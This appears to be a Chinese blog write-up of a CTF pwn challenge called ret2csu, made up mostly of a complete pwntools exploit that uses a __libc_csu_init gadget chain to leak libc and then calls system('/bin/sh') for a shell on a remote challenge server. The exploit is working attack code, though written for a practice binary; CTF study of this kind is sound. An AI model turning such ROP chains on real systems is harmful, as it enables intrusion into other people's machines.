PWN:[WEEK2]ret2csu

最新推荐文章于 2023-12-08 19:59:16 发布
最新推荐文章于 2023-12-08 19:59:16 发布
阅读量207 收藏
点赞数
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53932372/article/details/127415357
版权

很简单的ret2csu

只不过要耐心的调试一会儿。

exp

from pwn import *

context.log_level="debug"

def look(sh):
	gdb.attach(sh,"b *0x0004011BE")
	pause()

#sh=process("./ret2csu")
sh=remote("43.143.7.127",28451)
sla=lambda x,y :sh.sendlineafter(x,y)

#参考ctfwiki的文章
csu_front_addr = 0x00401290
csu_end_addr = 0x000004012AA

elf=ELF("./ret2csu")
libc=ELF("./libc.so.6")

def csu(rbx, rbp, r12, r13, r14, r15, last):
    # pop rbx,rbp,r12,r13,r14,r15

    # rbx should be 0,
    # rbp should be 1,enable not to jump
    # r12 should be the function we want to call

    # rdi=edi=r15d
    # rsi=r13
    # rdx=r14
    # 
	#实际调试时,要注意寄存器的不同。
	#本来看文章以为一样,结果程序的这段代码都不尽相同
	#所以还是要自己调试
    payload = b'a' * (0x100 + 8)
    payload += p64(csu_end_addr) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
    payload += p64(csu_front_addr)
    payload += b'a' *(6*8)+p64(write_plt)
    payload += p64(last)
    return payload

main=elf.sym["main"]
write_plt=elf.plt["write"]

print("[*][*][*][*][*][*][*][*][*][*][*][*]")
print(type(write_plt))
print(hex(write_plt))
print("[*][*][*][*][*][*][*][*][*][*][*][*]")

write_got=elf.got["write"]

payload=csu(0,1,1,write_got,8,0x404018,main)

#look(sh)
sla("Input:\n",payload)
sh.recvuntil("Ok.\n")
libc_base=u64(sh.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-libc.sym["write"]
libc.address=libc_base

print("[*][*][*][*][*][*][*][*][*][*][*][*]")
print(hex(libc_base))
print("[*][*][*][*][*][*][*][*][*][*][*][*]")

poprdi = 0x00000000004012b3#next(elf.search(asm('pop rdi;ret')))
binsh=next(libc.search(b"/bin/sh\x00"))
system=libc.sym["system"]
ret=0x000000000040101a
payload=b'a'* (0x100 + 8)+p64(poprdi)+p64(binsh)+p64(ret)+p64(system)
#look(sh)
sla("Input:\n",payload)
#sh.read()
sh.interactive()
we have a whole life
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn07.ret2syscall例题
11-11
ret2syscall例题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
PWN-ret2csu
recover517的博客
12-06 524
在x64中,如果遇到函数调用需要传入3个参数,分别依赖【rdi,rsi,rdx】三个寄存器,但通过ROPgadget无法找到相关的寄存器利用链,这时,我们就要开始考虑通过调用__libc_csu_init函数来实现传递3个参数的效果,这种实现方式,称为 ret2csu
wikiCTF-pwn-ret2csu
Oops-re的博客
10-20 398
在 64 位程序中,函数的前 6 个参数是通过寄存器传递的,但是大多数时候,我们很难找到每一个寄存器对应的 gadgets。这时候,我们可以利用 x64 下的 __libc_csu_init 中的 gadgets。
pwn中级ROP——ret2csu
turtlesd的博客
04-27 829
地址 栈中数据 return前 a * 136 main函数return(rsp) 0x400606(gadget1) rsp + 8 0(填充数据) rsp + 16(rbx) 0 rsp + 24(rbp) 1 rsp + 32(r12) write_got_addr rsp + 40(r13) 1 rsp + 48(r14) write_got_addr rsp + 56(r15) 8 gadget1的return 0x4005F0(gadget2)...
PWN-栈溢出之ret2csu
weixin_53394081的博客
04-23 328
PWN-栈溢出之ret2csu
从o开始的pwn学习之ret2csu
jzc020121的博客
04-09 2879
ret2csu 前置知识 X64寄存器 我们知道,64位寄存器有RAX,RBX,RCX,RDX,RDI,RSI,RBP,RSP,R8,R9,R10,R11,R12,R13,R14,R15,而rdi,rsi,rdx,rcx,r8,r9便用来传递函数的前六个参数,如多于六个,便在放到栈里。 __libc_csu_init 一般的程序都会调用libc中的函数,而此函数便是来将libc初始化的,故此函数几乎是每一个程序所必备的。 gadget 我们在构造ROP链的时候,往往会用到能够给寄存器赋值的gadget,形如
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
pwn刷题num48----syscall + ret2csu
tbsqigongzi的博客
05-04 889
BUUCTF-PWN-ciscn_2019_s_3 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 (这里为了省事,自己写了一个小shell脚本) 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下主函数 这里sys_read和sys_write读取的字符串大小都大于buf的大小,存在栈溢出 syscall 系统
PWN · ret2csu】[HNCTF 2022 WEEK2]ret2csu
Mr_Fmnwon的博客
11-11 466
记一道ret2csu
PWN · ret2libc】ret2libc1
Mr_Fmnwon的博客
05-08 1049
当函数运行到调用库函数时,程序将访问对应函数的plt表项,plt表项存着代码,代码分为两部分:第一部分,跳转到对应的got表。第二部分,查找函数的真实地址,修改got表内容。 got表项存着一个地址。然而这个地址并不一开始就是libc中函数的真实地址。 一开始,got表项中地址指向plt代码的第二部分。后来,因运行plt第二部分代码段,got表内容被修改为真实函数地址。依据以上,我们可以......分享几个实用的干货小技巧,不用IDA解决此题
pwn入门:基本栈溢出之ret2libc详解(以32位+64位程序为例)
最新发布
Bossfrank的博客
12-08 5489
本文详解了pwn题目中ret2libc的解题思路。简要介绍了plt表和got表的意义以及Linux中的延迟绑定技术,并通过32位和64位的两个具体题目具体的介绍了解pwn题的完整过程。
好好说话之ret2csu
hollk’s blog
06-22 5746
一、x64寄存器 在64位程序中,函数的前6各参数是通过寄存器传递的,可以看到rdi作为第一个参数,rsi作为第二个参数,rdx作为第三个参数,rcx作为第四个参数,r8作为第五个参数,r9作为第六个参数。也就是说在函数调用参数的时候会依次在六个寄存器中寻找,如果参数多余6个,那么就需要在栈中寻找。 63 31 ...
hnctf-pwn-week2
m0_64174759的博客
11-26 903
逆向,整数溢出,orw,栈迁移,ret2csu,partial overwrite
使用ROPgadget快速寻找arm64 pwn的rop链之ret2csu
fjh1997的博客
01-28 1132
ROPgadget --binary ./pwn --only "ldp|ret" 看到最长的那个就是,我们得到rop链的入口0x400ff8接下来使用x30寄存器跳转的地址就是0x400ff8-0x20也就是0x400fd8这块.rop链第一阶段的目的是将0x400fd8填充到x30寄存器中。 也可以用rop ROPgadget --binary ./chall --only "ldr|mov|add|blr" 找到rop链链接的第二个片段入口 最后我们可以在x3中填充我们想要的地址,比如lib.
中级ROP之ret2csu
至臻求学,胸怀云月
02-22 7297
ret2csu 原理 在64位程序中,函数的前6个参数是通过寄存器传递的,但是大多数时候,我们很难找到每一个寄存器对应的gadgets。这时候,我们可以利用x64下的__libc_csu_init中的gadgets,如例二情况。 这个函数是用来对libc进行初始化操作的,而一般的程序都会调用libc函数,所以这个函数一定会存在。 下面是我在IDA摘出来的__libc_csu_init函数的汇编...
pwntools:类型转换
m0_53932372的博客
09-08 4789
byte和str 首先一定要注意,byte和str在python里面有明确的区分,尤其是在做pwn的题目时,一定要注意这个问题。 参考链接:https://www.cnblogs.com/mlgjb/p/7899534.html hex hex(x) x -- 10进制整数 返回16进制数,以字符串形式表示。 p32、p64 p32(x) x-- 一个整型数据 返回byte型。 u32、u64 u32(x) x-- byte型 返回整型。 int类型转换 int(a,base=x)
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值